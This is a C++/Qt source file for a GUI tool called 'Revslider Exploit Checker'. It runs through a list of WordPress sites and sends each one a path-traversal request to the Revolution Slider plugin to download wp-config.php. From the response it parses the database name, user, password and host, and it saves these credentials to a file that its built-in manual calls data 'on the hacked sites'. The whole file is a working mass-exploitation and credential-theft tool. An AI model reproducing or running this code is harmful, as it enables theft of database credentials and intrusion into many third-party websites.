#include "mainwindow.h"
#include "ui_mainwindow.h"

MainWindow::MainWindow(QWidget *parent) :
    QMainWindow(parent),
    ui(new Ui::MainWindow)
{
    ui->setupUi(this);
    this->setWindowTitle("Revslider Exploit Checker v1.0");
}

MainWindow::~MainWindow()
{
    delete ui;
}

void MainWindow::on_sitesButton_clicked()
{
    QString sitesFile = QFileDialog::getOpenFileName(this, tr("Open sites file"), "", tr("TXT Files (*.txt)"));
    ui->sitesLine->setText(sitesFile);
}

void MainWindow::on_completeButton_clicked()
{
    QString completeFile = QFileDialog::getOpenFileName(this, tr("Open complete file"), "", tr("TXT Files (*.txt)"));
    ui->completeLine->setText(completeFile);
}

QString MainWindow::find(QString source, QString start, QString end)
{
    int left = source.indexOf(start) + start.size();
    int right = source.indexOf(end, left + 1);
    QString result = source.mid(left, right - left);

    return result;
}

void MainWindow::on_goButton_clicked()
{

    if(ui->sitesLine->text() != "" && ui->completeLine->text() != "")
    {
        int total = 0;
        int good = 0;
        int bad = 0;

        QFile inputFile(ui->sitesLine->text());
        if (inputFile.open(QIODevice::ReadOnly))
        {
           QTextStream in(&inputFile);
           while (!in.atEnd())
           {
              QString line = in.readLine();
              QString time = QTime::currentTime().toString();

              QNetworkAccessManager manager;
              QNetworkReply *response = manager.get(QNetworkRequest(QUrl("http://" + line + "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php")));
              QEventLoop event;
              connect(response,SIGNAL(finished()),&event,SLOT(quit()));
              event.exec();
              QString config = response->readAll();

              if(
                    (find(config, "DB_NAME', '", "');").size() < 30 && find(config, "DB_NAME', '", "');").size() > 0) ||
                    (find(config, "DB_USER', '", "');").size() < 30 && find(config, "DB_USER', '", "');").size() > 0)
              )
              {
                  good++;
                  total++;
                  ui->goodSites->setText(QString::number(good));
                  ui->totalSites->setText(QString::number(total));
                  ui->logArea->insertPlainText("[+] " + time + " - " + line + "\n[+] DB_NAME = " + find(config, "DB_NAME', '", "');") + "; DB_USER = " + find(config, "DB_USER', '", "');") + "; DB_PASSWORD = " + find(config, "DB_PASSWORD', '", "');") + "; DB_HOST = " + find(config, "DB_HOST', '", "');") + ";\n\n");
                  QString completeFile = ui->completeLine->text();
                  QFile file(completeFile);
                  if(file.open(QIODevice::Append))
                  {
                      QTextStream stream( &file );
                      stream << "[+] " + time + " - " + line + "\r\n[+] DB_NAME = " + find(config, "DB_NAME', '", "');") + "; DB_USER = " + find(config, "DB_USER', '", "');") + "; DB_PASSWORD = " + find(config, "DB_PASSWORD', '", "');") + "; DB_HOST = " + find(config, "DB_HOST', '", "');") + ";\r\n\r\n" << endl;
                  }
              }
              else
              {
                  total++;
                  bad++;
                  ui->totalSites->setText(QString::number(total));
                  ui->badSites->setText(QString::number(bad));
              }
           }
           inputFile.close();

           ui->logArea->insertPlainText("##### COMPLETE! TOTAL SITES: " + QString::number(total) + ", GOOD SITES: " + QString::number(good) + " #####");
        }
    }
    else
    {
        QMessageBox msgBox;
        msgBox.setText("Sites and complete files not found.\nPlease choose files.");
        msgBox.exec();
    }
}

void MainWindow::on_pushButton_clicked()
{
    QMessageBox msgBox;
    msgBox.setText("<p align=\"center\">Manual.<br /><br />1. In the \"Sites file\" to select a file with a list of sites, each site on a new line.<br /><br />2. In the field \"Complete file\" select the file where data will be stored on the hacked sites.<br /><br />3. Push the button \"Go!\" and enjoy the process!<br /><br /> Thanks!</p>");
//    msgBox.setFixedWidth(150);
    msgBox.setWindowTitle("Revslider Exploit Checker v1.0");
    msgBox.exec();
}
